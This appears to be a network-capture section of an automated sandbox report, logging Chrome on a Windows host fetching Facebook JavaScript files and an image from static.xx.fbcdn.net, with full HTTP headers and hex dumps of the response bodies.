                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: VM4lZ9pAdk+fp+/62ZtZjVIHAJs/b0RFaunLmNX+6vXuxRNwIZHsttsLpqifMTIf6NxEdc0ssqKg6/5GJa39IQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 10849
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC10848INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 61 4a 6f 65 53 48 6e 37 58 63 4e 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 62 6c 61 6b 65 6a 73 2d 31 2e 31 2e 30 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 7b 7d 3b 76 61 72 20 67 3d 7b 65 78 70 6f 72 74 73 3a 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 76 61 72 20 61 3d 22 49 6e 70 75 74 20 6d 75 73 74 20 62 65 20 61 6e 20 73 74 72 69 6e 67 2c 20 42 75 66 66 65 72 20 6f 72 20 55 69 6e 74 38 41 72 72 61 79 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 76 61
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/aJoeSHn7XcN/ */__d("blakejs-1.1.0",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a="Input must be an string, Buffer or Uint8Array";function b(b){va


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                55192.168.2.449805157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC385OUTGET /rsrc.php/v3i6l24/yP/l/ru_RU/GcN06huceZG.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: mSPkTjocO3asr/CIDMBqtw==
                                                                                                                                                                                                                                Expires: Sat, 20 Sep 2025 22:07:57 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: PwWGt1MpK464VR7CsDP0S1LHJhy2ktp2iKSpni8+CPuhzkc8SZqrx2mWgZYoiOMsTeh3zPaAYu8JeMwS6FBngA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=6, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 50088
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC15861INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 73 79 6e 63 44 4f 4d 22 2c 5b 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 46 42 4c 6f 67 67 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 7b 69 6e 76 6f 6b 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 7b 76 61 72 20 65 3d 61 5b 64 5d 2c 66 3d 65 5b 30 5d 2c 67 3d 65 5b 31 5d 2c 68 3d 65 5b 32 5d 3b 65 3d 65 5b 33 5d 3b 68 3d 68 26 26 63 7c 7c 6e 75 6c 6c 3b 67 26 26 28 68 3d 62 28 22 44 4f 4d 22 29 2e 73 63 72 79 28 68 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 67 29 5b 30 5d 29 3b 68 7c 7c 62 28 22 46 42 4c 6f 67 67 65 72 22
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("AsyncDOM",["CSS","DOM","FBLogger"],(function(a,b,c,d,e,f){a={invoke:function(a,c){for(var d=0;d<a.length;++d){var e=a[d],f=e[0],g=e[1],h=e[2];e=e[3];h=h&&c||null;g&&(h=b("DOM").scry(h||document.documentElement,g)[0]);h||b("FBLogger"
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC16384INData Raw: 65 20 64 69 73 70 6c 61 79 20 73 74 61 72 74 65 64 2e 20 54 68 69 73 20 69 73 20 61 20 6e 6f 2d 6f 70 2e 22 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 76 61 72 20 61 2c 62 3d 6e 65 77 28 63 28 22 44 65 66 65 72 72 65 64 22 29 29 28 29 3b 65 2e 70 75 73 68 28 62 2e 67 65 74 50 72 6f 6d 69 73 65 28 29 29 3b 72 65 74 75 72 6e 20 63 28 22 54 69 6d 65 53 6c 69 63 65 22 29 2e 67 75 61 72 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 26 26 63 28 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 22 29 28 61 29 2c 62 2e 72 65 73 6f 6c 76 65 28 29 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 44 69 73 70 6c 61 79 42 6c 6f 63 6b 69 6e 67 45 76 65 6e 74 22 2c 7b 70 72 6f 70 61 67 61 74 69 6f 6e 54 79 70 65 3a 63 28 22 54 69 6d 65 53 6c 69 63 65 22 29 2e 50 72
                                                                                                                                                                                                                                Data Ascii: e display started. This is a no-op.");return function(){}}var a,b=new(c("Deferred"))();e.push(b.getPromise());return c("TimeSlice").guard(function(){a&&c("clearTimeout")(a),b.resolve()},"AsyncRequestDisplayBlockingEvent",{propagationType:c("TimeSlice").Pr
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC16384INData Raw: 2e 61 62 6f 72 74 28 29 3b 61 2e 73 65 74 54 72 61 6e 73 70 6f 72 74 45 72 72 6f 72 48 61 6e 64 6c 65 72 28 64 29 7d 61 2e 61 62 6f 72 74 48 61 6e 64 6c 65 72 28 29 3b 4b 2e 75 6e 73 63 68 65 64 75 6c 65 28 61 29 7d 29 7d 3b 65 2e 61 62 61 6e 64 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 74 68 69 73 2e 63 6f 6e 74 69 6e 75 61 74 69 6f 6e 2e 6c 61 73 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3b 63 28 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 22 29 28 61 2e 74 69 6d 65 72 29 3b 61 2e 73 65 74 4f 70 74 69 6f 6e 28 22 73 75 70 70 72 65 73 73 45 72 72 6f 72 41 6c 65 72 74 73 22 2c 21 30 29 2e 73 65 74 48 61 6e 64 6c 65 72 28 62 3d 63 28 22 65 6d 70 74 79 46 75 6e 63 74 69 6f 6e 22 29 29 2e 73 65 74 45 72 72 6f 72 48 61
                                                                                                                                                                                                                                Data Ascii: .abort();a.setTransportErrorHandler(d)}a.abortHandler();K.unschedule(a)})};e.abandon=function(){var a=this;this.continuation.last(function(){var b;c("clearTimeout")(a.timer);a.setOption("suppressErrorAlerts",!0).setHandler(b=c("emptyFunction")).setErrorHa
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1458INData Raw: 2c 63 3b 28 61 3d 62 28 22 41 72 62 69 74 65 72 22 29 29 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 68 2c 5b 28 63 3d 62 28 22 50 61 67 65 45 76 65 6e 74 73 22 29 29 2e 42 49 47 50 49 50 45 5f 44 4f 4d 52 45 41 44 59 2c 62 28 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 29 2e 49 4e 49 54 49 41 4c 5f 4a 53 5f 52 45 41 44 59 5d 29 3b 61 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 69 2c 5b 63 2e 42 49 47 50 49 50 45 5f 44 4f 4d 52 45 41 44 59 2c 63 2e 42 49 47 50 49 50 45 5f 4f 4e 4c 4f 41 44 2c 62 28 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 29 2e 49 4e 49 54 49 41 4c 5f 4a 53 5f 52 45 41 44 59 5d 29 3b 61 2e 73 75 62 73 63 72 69 62 65 28 63 2e 4e 41 54 49 56 45 5f 4f 4e 42 45 46 4f 52 45 55 4e 4c 4f 41 44 2c 66 75 6e 63
                                                                                                                                                                                                                                Data Ascii: ,c;(a=b("Arbiter")).registerCallback(h,[(c=b("PageEvents")).BIGPIPE_DOMREADY,b("InitialJSLoader").INITIAL_JS_READY]);a.registerCallback(i,[c.BIGPIPE_DOMREADY,c.BIGPIPE_ONLOAD,b("InitialJSLoader").INITIAL_JS_READY]);a.subscribe(c.NATIVE_ONBEFOREUNLOAD,func


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                56192.168.2.449807157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC375OUTGET /rsrc.php/v3/yZ/r/YwPTeE82t1h.png HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1876INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: QyE5Q1JQF3oDPNLRd40ogw==
                                                                                                                                                                                                                                Expires: Wed, 17 Sep 2025 05:29:52 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 4XwOR6V4R9wOYu7LDa4fmQqUlzlv/Q35RZVjZfoYHKm3w27QyNDvx0eu5ATeW/IrwKkV25uaUb5K0Zmmty4e1w==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 3535
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1INData Raw: 89
                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC3534INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ab 00 00 00 38 08 03 00 00 00 b5 c4 f8 c6 00 00 02 91 50 4c 54 45 47 70 4c ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                Data Ascii: PNGIHDR8PLTEGpL


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                57192.168.2.449806157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC374OUTGET /rsrc.php/v3/y-/r/C5TXdJzIETO.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: ZXUSaTUvXH/z41yDoCXizg==
                                                                                                                                                                                                                                Expires: Sat, 20 Sep 2025 22:34:38 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: l39/0X1oahIXIxgLwctOpR/vUwS0A2RGzF3NzHfNfBktiBHltTv34qgZUSKZL15FfPYF9PrmsOSVka19sl9nog==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=4, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 4295
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC4294INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 58 44 4f 4d 53 63 61 6e 6e 65 72 52 65 73 75 6c 74 73 43 6f 6e 74 72 6f 6c 6c 65 72 52 6f 75 74 65 42 75 69 6c 64 65 72 22 2c 5b 22 6a 73 52 6f 75 74 65 42 75 69 6c 64 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 61 3d 63 28 22 6a 73 52 6f 75 74 65 42 75 69 6c 64 65 72 22 29 28 22 2f 73 68 61 72 65 64 2f 75 73 65 72 5f 70 72 65 66 65 72 65 6e 63 65 73 2f 22 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 7d 29 2c 76 6f 69 64 20 30 29 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 44 4f 4d 53 63 61 6e 6e 65 72 22 2c 5b 22 42 61 73 65 36 34 22 2c 22 43 6f 6e 73 74 55 72 69 55 74 69 6c 73 22 2c 22
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("XDOMScannerResultsControllerRouteBuilder",["jsRouteBuilder"],(function(a,b,c,d,e,f,g){a=c("jsRouteBuilder")("/shared/user_preferences/",Object.freeze({}),void 0);b=a;g["default"]=b}),98);__d("DOMScanner",["Base64","ConstUriUtils","


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                58192.168.2.449808157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC581OUTGET /rsrc.php/v3/y9/r/BTdUGzsTGVy.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: xM0p4JC4uzf0Tq5z3PsKvA==
                                                                                                                                                                                                                                Expires: Tue, 23 Sep 2025 18:22:43 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 0gxglF8xyTmIydkbm9D7FtxlRIgg2DURwTE+wJAcZVDFkHXo6pJGUDPyHsSFaaqPXJUUt6nthdhsVu1AoVY3iQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 6156
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC6155INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 44 4f 4d 43 6f 6e 74 72 6f 6c 22 2c 5b 22 24 22 2c 22 44 61 74 61 53 74 6f 72 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 69 73 2e 72 6f 6f 74 3d 62 28 22 24 22 29 2e 66 72 6f 6d 49 44 4f 72 45 6c 65 6d 65 6e 74 28 61 29 2c 74 68 69 73 2e 75 70 64 61 74 69 6e 67 3d 21 31 2c 62 28 22 44 61 74 61 53 74 6f 72 65 22 29 2e 73 65 74 28 61 2c 22 44 4f 4d 43 6f 6e 74 72 6f 6c 22 2c 74 68 69 73 29 7d 76 61 72 20 63 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 63 2e 67 65 74 52 6f 6f 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20
